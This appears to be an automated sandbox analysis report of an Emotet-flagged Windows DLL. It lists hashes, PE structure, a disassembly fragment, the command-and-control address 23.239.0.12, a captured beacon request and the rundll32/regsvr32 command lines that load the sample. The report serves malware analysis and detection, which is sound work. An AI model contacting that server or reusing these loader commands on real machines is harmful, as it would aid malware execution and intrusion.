                      https://disneyplus.com/legal.0%URL Reputationsafe
                      https://23.239.0.12/aw100%Avira URL Cloudmalware
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://23.239.0.12/0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      http://schemas.microsoft0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/true
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000017.00000003.736113156.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.735828686.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000017.00000003.736113156.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.735828686.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.hotspotshield.com/terms/svchost.exe, 00000017.00000003.729809833.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729965849.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729933938.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729828603.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729850048.000001F25E002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.730030081.000001F25E019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729874316.000001F25E003000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.pango.co/privacysvchost.exe, 00000017.00000003.729809833.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729965849.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729933938.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729828603.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729850048.000001F25E002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.730030081.000001F25E019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729874316.000001F25E003000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://disneyplus.com/legal.svchost.exe, 00000017.00000003.736113156.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.735828686.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://23.239.0.12/awregsvr32.exe, 00000006.00000003.467319252.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.775356330.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.467211849.00000000013E1000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://crl.ver)svchost.exe, 00000017.00000002.766213350.000001F25D2ED000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://www.tiktok.com/legal/reportsvchost.exe, 00000017.00000003.745516041.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000017.00000003.745558940.000001F25E002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.745533948.000001F25DB9F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.745516041.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.745479650.000001F25DBB5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.745454811.000001F25DBB5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://help.disneyplus.com.svchost.exe, 00000017.00000003.736113156.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.735828686.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://support.hotspotshield.com/svchost.exe, 00000017.00000003.729809833.000001F25DBA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729965849.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729933938.000001F25DB8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729828603.000001F25DBB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729850048.000001F25E002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.730030081.000001F25E019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.729874316.000001F25E003000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://schemas.microsoftsvchost.exe, 0000000E.00000002.548646295.000001A6FB27B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          23.239.0.12
                          unknownUnited States
                          63949LINODE-APLinodeLLCUStrue
                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:626489
                          Start date and time: 14/05/202204:55:572022-05-14 04:55:57 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 10m 41s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:r0hiaXHscs.dll
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:25
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal76.troj.evad.winDLL@19/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 50
                          • Number of non-executed functions: 214
                          Cookbook Comments:
                          • Found application associated with file extension: .dll
                          • Adjust boot time
                          • Enable AMSI
                          • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 20.223.24.244
                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          23.239.0.12Plt3z2W7KQ.dllGet hashmaliciousBrowse
                            2V7zjcga5L.dllGet hashmaliciousBrowse
                              RuqTBW6t32.dllGet hashmaliciousBrowse
                                yj81rxDZIp.dllGet hashmaliciousBrowse
                                  3j6e3XaMWM.dllGet hashmaliciousBrowse
                                    wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                      r0hiaXHscs.dllGet hashmaliciousBrowse
                                        TSvDnT6fkE.dllGet hashmaliciousBrowse
                                          x4ByCNJqst.dllGet hashmaliciousBrowse
                                            Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                              RuqTBW6t32.dllGet hashmaliciousBrowse
                                                yj81rxDZIp.dllGet hashmaliciousBrowse
                                                  x4ByCNJqst.dllGet hashmaliciousBrowse
                                                    lc4KFeS296.dllGet hashmaliciousBrowse
                                                      36yjawe0S4.dllGet hashmaliciousBrowse
                                                        Ns2al4764F.dllGet hashmaliciousBrowse
                                                          cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                            56vvRzZVQI.dllGet hashmaliciousBrowse
                                                              8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                  No context
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  LINODE-APLinodeLLCUSPlt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  lc4KFeS296.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  36yjawe0S4.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  Ns2al4764F.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  51c64c77e60f3980eea90869b68c58a8Plt3z2W7KQ.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  2V7zjcga5L.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  3j6e3XaMWM.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  wgJ5YjI2QO.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  r0hiaXHscs.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  TSvDnT6fkE.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  lc4KFeS296.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  36yjawe0S4.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  Ns2al4764F.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  No context
                                                                  No created / dropped files found
                                                                  File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Entropy (8bit):6.4820900629981555
                                                                  TrID:
                                                                  • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                  • Win64 Executable (generic) (12005/4) 10.17%
                                                                  • Generic Win/DOS Executable (2004/3) 1.70%
                                                                  • DOS Executable Generic (2002/1) 1.70%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                  File name:r0hiaXHscs.dll
                                                                  File size:545280
                                                                  MD5:28fd92e0ce7538516dcea70e239fb177
                                                                  SHA1:483d573cd7d464b01c880998e0321970a635e8d0
                                                                  SHA256:198a1b06c69382d00cf775aa56d2172f6d0412f31753bda078620107ee998283
                                                                  SHA512:aa78a2ce9c6118faa00b9a3d8adcc2603c607ddd3816a106155f1cac91a1a6c3aaab1d51954563af7a10477b8046e78adf509d2f5527f7fea65aa25ca1a3b402
                                                                  SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZfHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVv
                                                                  TLSH:22C4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
                                                                  Icon Hash:74f0e4ecccdce0e4
                                                                  Entrypoint:0x1800423a8
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x180000000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:2
                                                                  File Version Major:5
                                                                  File Version Minor:2
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:2
                                                                  Import Hash:b268dbaa2e6eb6acd16e04d482356598
                                                                  Instruction
                                                                  dec eax
                                                                  mov dword ptr [esp+08h], ebx
                                                                  dec eax
                                                                  mov dword ptr [esp+10h], esi
                                                                  push edi
                                                                  dec eax
                                                                  sub esp, 20h
                                                                  dec ecx
                                                                  mov edi, eax
                                                                  mov ebx, edx
                                                                  dec eax
                                                                  mov esi, ecx
                                                                  cmp edx, 01h
                                                                  jne 00007FB74CBB1BC7h
                                                                  call 00007FB74CBB3D54h
                                                                  dec esp
                                                                  mov eax, edi
                                                                  mov edx, ebx
                                                                  dec eax
                                                                  mov ecx, esi
                                                                  dec eax
                                                                  mov ebx, dword ptr [esp+30h]
                                                                  dec eax
                                                                  mov esi, dword ptr [esp+38h]
                                                                  dec eax
                                                                  add esp, 20h
                                                                  pop edi
                                                                  jmp 00007FB74CBB1A70h
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  dec eax
                                                                  mov dword ptr [esp+08h], ecx
                                                                  dec eax
                                                                  sub esp, 00000088h
                                                                  dec eax
                                                                  lea ecx, dword ptr [00014D05h]
                                                                  call dword ptr [0000FC7Fh]
                                                                  dec esp
                                                                  mov ebx, dword ptr [00014DF0h]
                                                                  dec esp
                                                                  mov dword ptr [esp+58h], ebx
                                                                  inc ebp
                                                                  xor eax, eax
                                                                  dec eax
                                                                  lea edx, dword ptr [esp+60h]
                                                                  dec eax
                                                                  mov ecx, dword ptr [esp+58h]
                                                                  call 00007FB74CBC074Ah
                                                                  dec eax
                                                                  mov dword ptr [esp+50h], eax
                                                                  dec eax
                                                                  cmp dword ptr [esp+50h], 00000000h
                                                                  je 00007FB74CBB1C03h
                                                                  dec eax
                                                                  mov dword ptr [esp+38h], 00000000h
                                                                  dec eax
                                                                  lea eax, dword ptr [esp+48h]
                                                                  dec eax
                                                                  mov dword ptr [esp+30h], eax
                                                                  dec eax
                                                                  lea eax, dword ptr [esp+40h]
                                                                  dec eax
                                                                  mov dword ptr [esp+28h], eax
                                                                  dec eax
                                                                  lea eax, dword ptr [00014CB0h]
                                                                  dec eax
                                                                  mov dword ptr [esp+20h], eax
                                                                  dec esp
                                                                  mov ecx, dword ptr [esp+50h]
                                                                  dec esp
                                                                  mov eax, dword ptr [esp+58h]
                                                                  dec eax
                                                                  mov edx, dword ptr [esp+60h]
                                                                  xor ecx, ecx
                                                                  call 00007FB74CBC06F8h
                                                                  jmp 00007FB74CBB1BE4h
                                                                  dec eax
                                                                  mov eax, dword ptr [eax+eax+00000000h]
                                                                  Programming Language:
                                                                  • [ C ] VS2008 build 21022
                                                                  • [LNK] VS2008 build 21022
                                                                  • [ASM] VS2008 build 21022
                                                                  • [IMP] VS2005 build 50727
                                                                  • [RES] VS2008 build 21022
                                                                  • [EXP] VS2008 build 21022
                                                                  • [C++] VS2008 build 21022
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x520000x3d5f0x3e00False0.355405745968data5.39330874285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                  RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                                  DLLImport
                                                                  KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                  ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
                                                                  NameOrdinalAddress
                                                                  DllRegisterServer10x180042050
                                                                  DllUnregisterServer20x180042080
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 14, 2022 04:57:53.988490105 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:53.988554955 CEST4434977223.239.0.12192.168.2.6
                                                                  May 14, 2022 04:57:53.988698006 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:54.029891014 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:54.029942989 CEST4434977223.239.0.12192.168.2.6
                                                                  May 14, 2022 04:57:54.571053982 CEST4434977223.239.0.12192.168.2.6
                                                                  May 14, 2022 04:57:54.571193933 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:55.201952934 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:55.202007055 CEST4434977223.239.0.12192.168.2.6
                                                                  May 14, 2022 04:57:55.202414036 CEST4434977223.239.0.12192.168.2.6
                                                                  May 14, 2022 04:57:55.202596903 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:55.216537952 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:55.260504007 CEST4434977223.239.0.12192.168.2.6
                                                                  May 14, 2022 04:57:56.068161011 CEST4434977223.239.0.12192.168.2.6
                                                                  May 14, 2022 04:57:56.068233013 CEST4434977223.239.0.12192.168.2.6
                                                                  May 14, 2022 04:57:56.068325996 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:56.068365097 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:56.069004059 CEST49772443192.168.2.623.239.0.12
                                                                  May 14, 2022 04:57:56.069027901 CEST4434977223.239.0.12192.168.2.6
                                                                  • 23.239.0.12
                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.64977223.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-05-14 02:57:55 UTC0OUTGET / HTTP/1.1
                                                                  Cookie: Gg=8GHy3N4Xm4BasGI7yF4aqbYZ+UfwCGyAbOlBL+16WxGiVKGpNRlXTVpgGtiVDv4o6m2fAcCSHbC7mYMUPTjqe4US1mRyANHQJL7kUXdkMIV97NOv6NlFY6ItHTPKLQm3cab3RqaCCTHdeUJgOXpfGnYvQigwPZkv1S1NderwBdUbUrQpVsTBxEAdf7eBMQneqNUwyO1NGdrv9JdDXBeFHpBIJABa3NfDOXQ+k98+uc8fHA==
                                                                  Host: 23.239.0.12
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  2022-05-14 02:57:56 UTC0INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Sat, 14 May 2022 02:57:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  2022-05-14 02:57:56 UTC0INData Raw: 32 35 31 0d 0a e5 09 5c cb b4 0b 45 71 b9 0d 63 89 8a a1 4c 32 be a8 03 f1 d7 47 67 c4 00 8c dc 92 a3 71 49 d9 f3 c4 aa 67 b2 f3 4a a7 39 d0 87 67 0c 1d 78 75 44 8f 06 3c 82 76 22 91 49 52 6a 51 c7 50 6d a1 5a 9c 4a 21 ce 14 80 13 bb ac c0 f6 1d 68 a8 6a 13 a8 b5 6b ac 0c 26 eb ac ad ef 44 3e 68 6d 50 00 78 73 57 23 ba a1 63 c6 22 53 bd 0b 82 cc be 87 0f a3 e3 19 88 af 18 45 fa aa 8c 4f f1 14 51 9f 6d f5 5e 7c 7b b1 43 3d c3 01 e3 b6 4d 6b b7 e9 1a 97 73 e8 f0 79 45 77 bb 09 fb e3 4a 3e aa db cd b6 0e 2a 4f b6 a9 4e be 93 05 66 f6 f8 57 18 ba d9 6d 5d b2 1b 02 3e 53 44 06 d0 b6 91 a4 ee 56 da 75 9c 51 af ac 14 f2 94 9e aa 37 77 66 b9 60 51 e7 01 19 bf 3a 91 01 85 f8 1f 99 0d 1d fb b3 f5 a3 ae 40 7e 75 8e fb bc d1 25 6c 23 89 58 3c bd 69 db f7 3d eb bf b9
                                                                  Data Ascii: 251\EqcL2GgqIgJ9gxuD<v"IRjQPmZJ!hjk&D>hmPxsW#c"SEOQm^|{C=MksyEwJ>*ONfWm]>SDVuQ7wf`Q:@~u%l#X<i=


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:04:57:14
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\loaddll64.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\r0hiaXHscs.dll"
                                                                  Imagebase:0x7ff7fbfc0000
                                                                  File size:140288 bytes
                                                                  MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:1
                                                                  Start time:04:57:15
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:2
                                                                  Start time:04:57:16
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\r0hiaXHscs.dll
                                                                  Imagebase:0x7ff655080000
                                                                  File size:24064 bytes
                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.401159904.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Target ID:3
                                                                  Start time:04:57:16
                                                                  Start date:14/05/2022
                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1
                                                                  Imagebase:0x7ff71b1e0000
                                                                  File size:69632 bytes
                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
